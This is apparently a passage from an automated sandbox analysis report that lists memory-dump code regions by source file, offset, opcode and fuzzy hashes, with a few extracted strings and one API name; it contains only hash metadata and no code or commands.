                                        • Opcode ID: 4dcc06113a2cd7a5508621ccffa8da2cef8f0d15d630f91c989826465eaf29ab
                                        • Instruction ID: 77f4aa9da58e9f229a713104c5f13ee8fd3261bbe7a969ce795ce6626446b437
                                        • Opcode Fuzzy Hash: 4dcc06113a2cd7a5508621ccffa8da2cef8f0d15d630f91c989826465eaf29ab
                                        • Instruction Fuzzy Hash: B2D0C93514D3C49FCB2B8FB9E4A48D83F715E4322470914DED8868F9B3C9368489CB06
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae9a4ec2ea8603dfa6ef77f4a73aedc47320879e6f44101e471923ed295058af
                                        • Instruction ID: 70481391838cc1de7007086fef99bc9b61992f1538a7e164a2dbb26426525726
                                        • Opcode Fuzzy Hash: ae9a4ec2ea8603dfa6ef77f4a73aedc47320879e6f44101e471923ed295058af
                                        • Instruction Fuzzy Hash: A5D09239B40218CFCB04CB94E89AA9DF371FB84315F5080A6EA1597351CB32AD16CB40
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cd42811e3ea9d3fe22dc0eb6c2ac78b110fdd1c31deae8a35f2f44de9840ab8
                                        • Instruction ID: 327ce37567caa532e3d3442f602ad74e1015af8f53fd0adffbfece24a70031e1
                                        • Opcode Fuzzy Hash: 5cd42811e3ea9d3fe22dc0eb6c2ac78b110fdd1c31deae8a35f2f44de9840ab8
                                        • Instruction Fuzzy Hash: 34C0481A18FBC49EE703523148A1682AF301A4202038F12CB8180CE9A3C24D880ACB53
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1950459656.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cf9ba712b215eea32ce0cc09931df3700530fcec52784042779bb807e6a1279
                                        • Instruction ID: 464a75f62b4f717c06eaffcdff4e0e36be4a8dc3232ce7c3aa52192ef8d0661a
                                        • Opcode Fuzzy Hash: 8cf9ba712b215eea32ce0cc09931df3700530fcec52784042779bb807e6a1279
                                        • Instruction Fuzzy Hash: AEB09231044B088FC25C6FB9E414818772EAB8431578004ACE80E0BA928E36E885CA84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2015781577.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 84l$84l$Jl$Jl$Jl$Jl$Jl$rl$rl
                                        • API String ID: 0-2781278049
                                        • Opcode ID: 481dc1954201e9070718e6da1611e187413956e678c0bd009b65a595ced83b74
                                        • Instruction ID: add488c92b32acc94945da8595eb7ef8149ad736d4cac409b9a860030b9ce3a0
                                        • Opcode Fuzzy Hash: 481dc1954201e9070718e6da1611e187413956e678c0bd009b65a595ced83b74
                                        • Instruction Fuzzy Hash: 1DD15CB5B0434ACFE7259B69840866BBFB6AFC6311F24C46BC549CF259DB31C841C7A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: kU3n^${U3n^$[3n^
                                        • API String ID: 0-3138937978
                                        • Opcode ID: 2068b8dfb386be24d8622d32cc40486848904c0c8a2cf7749cf0346d587348c1
                                        • Instruction ID: 794b7b351b2e13c2128610e02adaa542bf97f59489254db8820b042355f902e1
                                        • Opcode Fuzzy Hash: 2068b8dfb386be24d8622d32cc40486848904c0c8a2cf7749cf0346d587348c1
                                        • Instruction Fuzzy Hash: 61916070F00B159BEB29EFB9941066E7BB2AFC4B00B40891DD516AF384DF3469078BD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: kU3n^${U3n^$[3n^
                                        • API String ID: 0-3138937978
                                        • Opcode ID: f8a87345755f44543411ea94b40f40c9bfbd82b713a2e6558b04774b422f9276
                                        • Instruction ID: 51440fca68b7075b3546a81af98dc976cb36b8df59eb815587fd04d756220588
                                        • Opcode Fuzzy Hash: f8a87345755f44543411ea94b40f40c9bfbd82b713a2e6558b04774b422f9276
                                        • Instruction Fuzzy Hash: 23914071F00B149BEB29EFB9941066E7BB2EFC4B00B40892CD516AB344DF746A078BD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: _$Jl$Jl$Jl$rl$rl
                                        • API String ID: 0-956669229
                                        • Opcode ID: 808a4148be4ad30f51321e5d6966602d174f172b2dbfb486753611415ff19495
                                        • Instruction ID: cc0e229b2d256278ef4ab839782d2298a2b99c8e9fe4b4176c79b022cd5ce6d0
                                        • Opcode Fuzzy Hash: 808a4148be4ad30f51321e5d6966602d174f172b2dbfb486753611415ff19495
                                        • Instruction Fuzzy Hash: BDF138B1B00306CFDB65AB69C8017AABBE5BF85315F1484BAD905CF291DB31DD41C7A1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2037801124.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 58c8f50f4238709c0bf83b55f167386305ceb86cc317ee32ed137ed6c24cc37c
                                        • Instruction ID: 7b33ec8c561d808b13a37e82cf8bd582ad9f4026fd2a4bcece2701bfc6f99288
                                        • Opcode Fuzzy Hash: 58c8f50f4238709c0bf83b55f167386305ceb86cc317ee32ed137ed6c24cc37c
                                        • Instruction Fuzzy Hash: 811125B5D003498FDB20DF9AC885B9EFBF4EB89325F24841AE419A3750C774A945CFA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2037801124.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: e5e22d79558df595e7be6d4abb9b7f7f57f46eff733e8f1d3086e8220828ce60
                                        • Instruction ID: 30be6f6673196595e5c2a0c2f2865130a7ec2364a25c85c0be62063d04fa0f2d
                                        • Opcode Fuzzy Hash: e5e22d79558df595e7be6d4abb9b7f7f57f46eff733e8f1d3086e8220828ce60
                                        • Instruction Fuzzy Hash: E41133B5D003088FDB20DF9AC885B9EFBF8EB48324F24841AE419A3350C774A945CFA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl
                                        • API String ID: 0-143229547
                                        • Opcode ID: e7614d351a247cdea2b480b0dfb79baa881772547e38e65a5115a629cbd725ce
                                        • Instruction ID: 9e3c85a59cd902abb110cae56c789045676528af4152cf67402560140c90a305
                                        • Opcode Fuzzy Hash: e7614d351a247cdea2b480b0dfb79baa881772547e38e65a5115a629cbd725ce
                                        • Instruction Fuzzy Hash: 69418D34E042059FCB25DFBAE8546ADBBF1EF49312F1081A9D415AB395DB307D0ACB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl
                                        • API String ID: 0-143229547
                                        • Opcode ID: ed5d86af1b6872195829dd425d167ce740bd391d3cad6d04dc55f6b91486ca2b
                                        • Instruction ID: 00ef1b387178700b704d0b6fa11a3ca53e0b0df68e05b9f5ed2d7d975364789a
                                        • Opcode Fuzzy Hash: ed5d86af1b6872195829dd425d167ce740bd391d3cad6d04dc55f6b91486ca2b
                                        • Instruction Fuzzy Hash: 2341CE74A00205DFCB15DF6AE4546ADBBF2EF48302F148569D416AB395DB30BD06CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl
                                        • API String ID: 0-143229547
                                        • Opcode ID: 370b9784e44ef615b93a148ba9c84bcd00179898ea5682abe49e8af47fb226e0
                                        • Instruction ID: 5ba253d555eeac8ab632eebd4b36d628a0f885b20a9547df5057166bd3549a25
                                        • Opcode Fuzzy Hash: 370b9784e44ef615b93a148ba9c84bcd00179898ea5682abe49e8af47fb226e0
                                        • Instruction Fuzzy Hash: 73316D34A00206DFDB24DF69E594A9EBBF2FF88205F108528D416AB344DB34AD05CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: .3n^
                                        • API String ID: 0-402911317
                                        • Opcode ID: 8aafd78d4860f25a1dd3fca028bd68b48e65c9bf24b338851d29f82e3d8a4326
                                        • Instruction ID: d547b8bc0f95491622933a35793a503af6c8a4c359b36e893512c22a39111847
                                        • Opcode Fuzzy Hash: 8aafd78d4860f25a1dd3fca028bd68b48e65c9bf24b338851d29f82e3d8a4326
                                        • Instruction Fuzzy Hash: 2E0128317042155BCB2A5A5FD8044FDBBAACFCA222704806AE409D7B50EE61FC0787E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: .3n^
                                        • API String ID: 0-402911317
                                        • Opcode ID: 79604d878dde92fe719e8b2d5fab7d67f735f1c4cb1c413083735eceb2446565
                                        • Instruction ID: 3a240e7ae19b0de6b92347a9f1332a142dcef8000fd69f2c9954340e00d86bc2
                                        • Opcode Fuzzy Hash: 79604d878dde92fe719e8b2d5fab7d67f735f1c4cb1c413083735eceb2446565
                                        • Instruction Fuzzy Hash: 69E0C231740A11479226671EA8008AFB7EADFC6672311802EE41ACB700DE60FC0647D5
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed2b7bb5c33c74c8dd6d85f82b8acc8840649a2637658a0a813fa6c6d5d10674
                                        • Instruction ID: 8106c021366a0cedecdcfb5a5463fb4b3ddbcf355ea376c78d4b300570880464
                                        • Opcode Fuzzy Hash: ed2b7bb5c33c74c8dd6d85f82b8acc8840649a2637658a0a813fa6c6d5d10674
                                        • Instruction Fuzzy Hash: D2128BB1704352CFD755AF7898117AABBB69FC2228F24847BD905CF692DB32C841C792
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fde887b056e73f121ba21b804651746a015e2893a5b84061cf9575f53de26e87
                                        • Instruction ID: f5dcd03530a5861f42056a8f0d953683bda7b0014ee725aab9a80cedd0bcbe0e
                                        • Opcode Fuzzy Hash: fde887b056e73f121ba21b804651746a015e2893a5b84061cf9575f53de26e87
                                        • Instruction Fuzzy Hash: 9361F871E00248DFDB14DFAAD584A9DBBF1EF88311F148129E819AB354EB74AD46CB50
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 552afb3931c6b44737b308a558bcd0e33e61853889d275a151b04ece217eb9dc
                                        • Instruction ID: 59400036431e7822f6e88202ced6963359b2d3e25e3f3c5758fd13b79881bcc6
                                        • Opcode Fuzzy Hash: 552afb3931c6b44737b308a558bcd0e33e61853889d275a151b04ece217eb9dc
                                        • Instruction Fuzzy Hash: 9751CF317002059FE714EB6AD854A7A77EAFFC9216F248569D509CB391EB31EC03CB90
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95b2b1dc8b5ae2bb691bf0f943a9c9e9acdb18dfb30081128055ca6f951ff090
                                        • Instruction ID: 176c2f15e9f554a75a20661655cc4d5a17d136a74a9a6b4e003fbb3babb5c576
                                        • Opcode Fuzzy Hash: 95b2b1dc8b5ae2bb691bf0f943a9c9e9acdb18dfb30081128055ca6f951ff090
                                        • Instruction Fuzzy Hash: 34511971E00248DFDB14DFAAD484B9DFBF1EF88311F148169E819AB364EB74A846CB51
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c073f80ddbb05dabd09519fab250daa55aaafd3054417d976a37555fd6417ce5
                                        • Instruction ID: c1391daa28bb0c14de7e272f82baee63f3449bfcafcc5102ec1e18b942ed3131
                                        • Opcode Fuzzy Hash: c073f80ddbb05dabd09519fab250daa55aaafd3054417d976a37555fd6417ce5
                                        • Instruction Fuzzy Hash: 01515038B003058FDB21DF79E584E6A7BE2AFC82167558568E449CF356EB30ED078B51
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7283478e6a134c55de031f23afb0b800f00b50281f30e60cd75b3dcdbd3e7f6b
                                        • Instruction ID: 35964eab4c213769c5606eca874123ae3671f0313c6e8c0f4eb3123176624a20
                                        • Opcode Fuzzy Hash: 7283478e6a134c55de031f23afb0b800f00b50281f30e60cd75b3dcdbd3e7f6b
                                        • Instruction Fuzzy Hash: 48414F34B00305CFDB20DF69E584E6AB7E6EFC82157558568E449CF355EB30ED068BA1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4661c65160a106eb17ab8b4f1bf5aea69ae49bebe8351cb2078fa29879c0f229
                                        • Instruction ID: 3d7515623d4aa25fcfd0926b7694b693823dad58333ed6e082b4da0947f76f96
                                        • Opcode Fuzzy Hash: 4661c65160a106eb17ab8b4f1bf5aea69ae49bebe8351cb2078fa29879c0f229
                                        • Instruction Fuzzy Hash: DC411B34B042058FDB18DFA5C468AADBBF1EF8D712F144098E506EB395DB35AD02CB61
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 998184d2a4d4fa1239e245e26e538fbbb2838669fc340ef07fc629eecfcf561c
                                        • Instruction ID: bfcd92e090be43f743869341d1282acc36d59cbb59d71b25f56907aea21e47a6
                                        • Opcode Fuzzy Hash: 998184d2a4d4fa1239e245e26e538fbbb2838669fc340ef07fc629eecfcf561c
                                        • Instruction Fuzzy Hash: 783123F0A10202DFCBA4AF54C502B6EB7B6AF85A5CF14846AD904AF792D735EC44C7A1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5614c883de7c5dce0c5de8bf4a4d94b76be60f07b497c6c5f81c96808f03e6e8
                                        • Instruction ID: 86178456048604eeedb844ea6b3af3af3eb2f800987607783a8a0fd44153cd93
                                        • Opcode Fuzzy Hash: 5614c883de7c5dce0c5de8bf4a4d94b76be60f07b497c6c5f81c96808f03e6e8
                                        • Instruction Fuzzy Hash: 58314F34B042458FCB15DFA5C864AA9BBF5EF8D311F144098D546EB395DB35EC02CB60
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c25ddf12c9b33dbc310be9acfff81f3e956e7b7a5329551552461c7dbc04dfe8
                                        • Instruction ID: 5fbb6cf98f752f17f64b42df85fd5d4ffb64143e20895112b775eb17b8204bfb
                                        • Opcode Fuzzy Hash: c25ddf12c9b33dbc310be9acfff81f3e956e7b7a5329551552461c7dbc04dfe8
                                        • Instruction Fuzzy Hash: CB3184353406009FE715EB75E844B6EB796EFC4216F108639D60ACB355DF71A806C7A2
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 953be9e119581163fc10e9f889d6f33cf27bc29be654dc1b07398ed1b2aa3107
                                        • Instruction ID: fa3cf9fb0a3426e270daaba5b142ddf8a29121a3e1afec9ac6dd4fd86642e527
                                        • Opcode Fuzzy Hash: 953be9e119581163fc10e9f889d6f33cf27bc29be654dc1b07398ed1b2aa3107
                                        • Instruction Fuzzy Hash: 87317E70E002098BDB15DFBAD4947BE7BF6EF88311F148029E505EB254EB74AC428B61
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f11fd3b347178ba9a0139ad77b83edc9b832a5e201c876f36db748e04b8c513
                                        • Instruction ID: 5a5c46eb8d2f3470a4165bc447a553b84b257cb5f3308adb404fa8b7c16ced64
                                        • Opcode Fuzzy Hash: 1f11fd3b347178ba9a0139ad77b83edc9b832a5e201c876f36db748e04b8c513
                                        • Instruction Fuzzy Hash: CF31A870F002049FEB15EBA4D854ABE7BB2EFC5305F1184A9D614AB395DB39AD02CB61
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae858849189778a556b2c7d36342807a95cb2128b9d168d269b1ca809fd3a935
                                        • Instruction ID: a33783c9963fad46b6e86341f20d84555536b5e3a5ef39ca23a539ee627ccbd9
                                        • Opcode Fuzzy Hash: ae858849189778a556b2c7d36342807a95cb2128b9d168d269b1ca809fd3a935
                                        • Instruction Fuzzy Hash: 1B319E30B002048FDB14DF69E4586AEBBF2FF88325F148129D506EB394DB35AC86CB91
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d0a30693b1683451ed49e8df1a5cbb3c789cad670e351db864b68c901995f220
                                        • Instruction ID: 5789b57f0803040b6b784179f00a13e88420fb1f9653df9a1bf61c13f4408916
                                        • Opcode Fuzzy Hash: d0a30693b1683451ed49e8df1a5cbb3c789cad670e351db864b68c901995f220
                                        • Instruction Fuzzy Hash: D6314B70E002098FDB19DFAAD4947BEBBF6EF88301F148029E505EB354EB749C428B65
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63c6973f8abc23bff84343a9ca4da7a7fe2031ee406678813337fbb74cb23554
                                        • Instruction ID: aa2d4d4e171f2e082983fd15c3e2ec9425da7a2678e2bb9d92471f5ae9a28090
                                        • Opcode Fuzzy Hash: 63c6973f8abc23bff84343a9ca4da7a7fe2031ee406678813337fbb74cb23554
                                        • Instruction Fuzzy Hash: 2E21B575E043598FDB25DFAAD4007AEBFF5EB89310F14842AD418E7350CB75A8068BA5
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f04088f25cc3a002730267128e4a2bea0840b032908e7e33c37eae8058da259
                                        • Instruction ID: 32ecb75b9fa4d67514ef9693b34b0f02da6f33c485a6a622d1c53be746344788
                                        • Opcode Fuzzy Hash: 9f04088f25cc3a002730267128e4a2bea0840b032908e7e33c37eae8058da259
                                        • Instruction Fuzzy Hash: 4E3190B0D053848EEB60CF6AC08879AFFF2EF84311F28C46DD8599B215D6B5A442CB61
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2dba73729c759f87417437bc4607e7be587a2d51bdf49f32b6d28a5c8a75675
                                        • Instruction ID: 2eb4f793370998431ba5608a2b62c6128940941fa5850ffa25395605bcc21227
                                        • Opcode Fuzzy Hash: b2dba73729c759f87417437bc4607e7be587a2d51bdf49f32b6d28a5c8a75675
                                        • Instruction Fuzzy Hash: 15314C30B042048FDB14DF69E4586AEBBF2FF88325F148529D406EB394DB75AC85CB91
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c139311bf8e38e9d3d54495261601bd1adb366fe8e7b1ea499db9a940588ed2
                                        • Instruction ID: 55eb8793c05d919981afd2ccf7fd16fdceace806e86f37c852b1c3956ef82486
                                        • Opcode Fuzzy Hash: 4c139311bf8e38e9d3d54495261601bd1adb366fe8e7b1ea499db9a940588ed2
                                        • Instruction Fuzzy Hash: AF3132B4F002059FEB14EBA4D454ABE77B3EFC4305F108469D615AB394DB39AD018F60
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b88487788211aa865a42561b2ae883a313d4458ffdf57847978f446d6c1c29a
                                        • Instruction ID: 97ea41db118cf1ea6e5f30176efa4bc4d076c8f6eed0902ea82e36a5c61413bd
                                        • Opcode Fuzzy Hash: 4b88487788211aa865a42561b2ae883a313d4458ffdf57847978f446d6c1c29a
                                        • Instruction Fuzzy Hash: 86217AB4D057448FEB60CF6AD48879AFFF2EB88311F28C42ED85D97215D7B464828B61
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e3a84b847d584ebd70bf669a4d14bd3fb6f68358d2cbb5785b1c7007bab3b6d
                                        • Instruction ID: b73579e665ea086ce6080f17bce4c7c8bb0cd2006a452a6156b702a52042d210
                                        • Opcode Fuzzy Hash: 9e3a84b847d584ebd70bf669a4d14bd3fb6f68358d2cbb5785b1c7007bab3b6d
                                        • Instruction Fuzzy Hash: E3112B36B001188FDB14EFA9E840AED77F6EFCC266B0440A4E909DB350DB30ED028B90
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2a763e9a7cef8fc047e23eae5665bc9c1488f2ea7801d80f6921ae48ccd6864
                                        • Instruction ID: 5bf45ff3c18403ddabc6d56ad80137e7a84e43af9c1892ed24fd95f6520e57eb
                                        • Opcode Fuzzy Hash: d2a763e9a7cef8fc047e23eae5665bc9c1488f2ea7801d80f6921ae48ccd6864
                                        • Instruction Fuzzy Hash: F5116131A083449FD739DB66D498A697BE1EF45211F2484AEE08EC76B2DA21F886C740
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0521b096d00a24ac60056e85c6b7efee58b361b0d8720cd46275ca93e9480473
                                        • Instruction ID: 0772831d4129c4cc37ae741e3a9e496044ca4daf6649693c88e1c03031ff853e
                                        • Opcode Fuzzy Hash: 0521b096d00a24ac60056e85c6b7efee58b361b0d8720cd46275ca93e9480473
                                        • Instruction Fuzzy Hash: 4701F535B052449FCB26DA79D8484FCBBB1EF89312F1480A9D50697352DA31AC178BA1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db72a938e0dd654907c199db3d70d466deb6e888897e623f78f998bbb1f9ada9
                                        • Instruction ID: 28b7a684ccd683eb12c300936ed4fb8225e53b28385d7792f4724fe19c6ec3f3
                                        • Opcode Fuzzy Hash: db72a938e0dd654907c199db3d70d466deb6e888897e623f78f998bbb1f9ada9
                                        • Instruction Fuzzy Hash: D2110C342047508FC764DF79D0948AAB7F6EF8531532489ADD44A87B90CB31FC46CB50
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7113d91fd57ed2993175664861e6328c683a4f16e04c2a2bc49a26723068da2e
                                        • Instruction ID: 18f1697952da32c670cfcf0dc18af6112f789b9dcc9b5a8578476d0d8552f882
                                        • Opcode Fuzzy Hash: 7113d91fd57ed2993175664861e6328c683a4f16e04c2a2bc49a26723068da2e
                                        • Instruction Fuzzy Hash: 73014035B00214DFCB159B75E8486AEBBB6FB88255F24806DE51ED3242DB319911CB91
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0157a816e3d6daae5f211ec0649a3dbb2a7ec688f599b02ec8527333a095bf56
                                        • Instruction ID: 408f9df42f16dcb9e1baf3f0393d74409382539fc7f4cfee4c4c8706f6c208d4
                                        • Opcode Fuzzy Hash: 0157a816e3d6daae5f211ec0649a3dbb2a7ec688f599b02ec8527333a095bf56
                                        • Instruction Fuzzy Hash: 47F028313193A01FD7018ABA8C509777FE8DF86261B0440ABF444CB3A2DA70DC00CB60
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4f064eb93006a0637356cca1cdd416f85668e5f19b25d0439990a52a241e07f
                                        • Instruction ID: b5e0c5033ae53123e1cbde0ffaf571a2aec08acfffefdf82ec37df125848c0da
                                        • Opcode Fuzzy Hash: f4f064eb93006a0637356cca1cdd416f85668e5f19b25d0439990a52a241e07f
                                        • Instruction Fuzzy Hash: 7701F2B26082005FE712AB79D4547EB3BA5DBC2325F54816ACA1647286CE793C06C7B1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53485cdae2c866471c894a220578ae3c223a3fccf52e8f81314959889797c46a
                                        • Instruction ID: 8f63508cb64e7eeed94051593364ea5118553ab2b409cfede77590cae9005055
                                        • Opcode Fuzzy Hash: 53485cdae2c866471c894a220578ae3c223a3fccf52e8f81314959889797c46a
                                        • Instruction Fuzzy Hash: ADF09071705714AFD724AA5AE840A6F77E9FB88726F000529E10AD7350DF71AC4287A4
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
